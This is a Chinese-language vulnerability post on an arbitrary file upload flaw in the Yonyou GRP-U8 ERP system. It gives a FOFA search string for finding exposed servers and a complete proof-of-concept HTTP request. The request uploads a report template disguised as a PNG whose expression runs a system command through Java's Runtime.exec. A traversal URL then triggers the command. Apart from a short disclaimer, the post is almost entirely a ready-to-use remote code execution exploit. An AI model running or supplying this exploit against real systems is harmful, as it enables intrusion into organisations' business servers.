文章目录
- 前言
- 声明
- 一、漏洞描述
- 二、影响版本
- 三、漏洞复现
前言
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。该产品存在任意文件上传漏洞。
声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、漏洞描述
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。该产品存在任意文件上传漏洞。
二、影响版本
用友GRP-U8
三、漏洞复现
FOFA: app="用友-GRP-U8" && port="88"
利用POC
POST /UploadFile HTTP/1.1
Host: XXX.XX.XX.XX:88
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: JSESSIONID=18F403D91DD537D8DAA24D5A4B45C818
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Length: 3491
------WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Disposition: form-data; name="input_localfile"; filename="demodemo.png"
Content-Type: application/octet-stream
<jatools Class="jatools.ReportDocument" Name="jatools report template">
<VariableContext>
</VariableContext>
<Page>
<Name>panel</Name>
<Children ItemClass="PagePanel">
<Item0>
<Name>header</Name>
<Width>753</Width>
<Height>80</Height>
<Children ItemClass="Label">
<Item0>
<ForeColor>-65536</ForeColor>
<X>41</X>
<Y>15</Y>
<Width>362</Width>
<Height>62</Height>
</Item0>
</Children>
<Type>100</Type>
</Item0>
<Item1>
<Name>footer</Name>
<Y>802</Y>
<Width>753</Width>
<Height>280</Height>
<Type>103</Type>
</Item1>
<Item2>
<Name>body</Name>
<Y>80</Y>
<Width>753</Width>
<Height>722</Height>
<Children ItemClass="Table">
<Item0>
<NodePath>学生表</NodePath>
<X>115</X>
<Y>77</Y>
<Children>
<Item0 Class="Label">
<Text>家庭成员</Text>
<Border/>
<PrintStyle>united-level:1;</PrintStyle>
<Cell>
<Row>3</Row>
<Col>0</Col>
<RowSpan>2</RowSpan>
</Cell>
</Item0>
<Item1 Class="Label">
<Text>关系</Text>
<BackColor>-4144897</BackColor>
<Border/>
<Cell>
<Row>3</Row>
<Col>1</Col>
</Cell>
</Item1>
<Item2 Class="Label">
<Text>性别</Text>
<BackColor>-4144897</BackColor>
<Border/>
<Cell>
<Row>3</Row>
<Col>2</Col>
</Cell>
</Item2>
<Item3 Class="Label">
<Text>年龄</Text>
<BackColor>-4144897</BackColor>
<Border/>
<Cell>
<Row>3</Row>
<Col>3</Col>
</Cell>
</Item3>
<Item4 Class="Label">
<Text>得分</Text>
<Border/>
<Cell>
<Row>2</Row>
<Col>0</Col>
</Cell>
</Item4>
<Item5 Class="Label">
<Text>性别</Text>
<Border/>
<Cell>
<Row>1</Row>
<Col>0</Col>
</Cell>
</Item5>
<Item6 Class="Label">
<Text>姓名</Text>
<Border/>
<Cell>
<Row>0</Row>
<Col>0</Col>
</Cell>
</Item6>
<Item7 Class="Text">
<Variable>=$学生表</Variable>
<Border/>
<Cell>
<Row>0</Row>
<Col>1</Col>
<ColSpan>3</ColSpan>
</Cell>
</Item7>
<Item8 Class="Text">
<Variable>=$学生表.value()</Variable>
<Border/>
<Cell>
<Row>1</Row>
<Col>1</Col>
<ColSpan>3</ColSpan>
</Cell>
</Item8>
<Item9 Class="Text">
<Variable>=$学生表.getName()</Variable>
<Border/>
<Cell>
<Row>2</Row>
<Col>1</Col>
<ColSpan>3</ColSpan>
</Cell>
</Item9>
<Item10 Class="RowPanel">
<Cell>
<Row>4</Row>
<Col>0</Col>
<ColSpan>4</ColSpan>
</Cell>
<Children ItemClass="Text">
<Item0>
<Variable></Variable>
<Border/>
<Cell>
<Row>4</Row>
<Col>3</Col>
</Cell>
</Item0>
<Item1>
<Variable></Variable>
<Border/>
<Cell>
<Row>4</Row>
<Col>2</Col>
</Cell>
</Item1>
<Item2>
<Variable>;</Variable>
<Border/>
<Cell>
<Row>4</Row>
<Col>1</Col>
</Cell>
</Item2>
</Children>
<NodePath>成员</NodePath>
</Item10>
</Children>
<ColumnWidths>60,60,60,60</ColumnWidths>
<RowHeights>20,20,20,20,20</RowHeights>
</Item0>
</Children>
<Type>102</Type>
</Item2>
</Children>
</Page>
<NodeSource>
<Children ItemClass="ArrayNodeSource">
<Item0>
<Children ItemClass="ArrayNodeSource">
<Item0>
<TagName>成员</TagName>
<Expression>$.value()</Expression>
</Item0>
</Children>
<TagName>学生表</TagName>
<Expression>new Object[]{new BufferedReader(new InputStreamReader(java.lang.Runtime.getRuntime().exec("whoami").getInputStream())).readLine()}</Expression>
</Item0>
</Children>
</NodeSource>
</jatools>
------WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Disposition: form-data; name="type"
1
------WebKitFormBoundaryicNNJvjQHmXpnjFc—
执行结果如下
然后访问 /u8qx/tools/defaultviewer.jsp?file=../../upload/demodemo.png
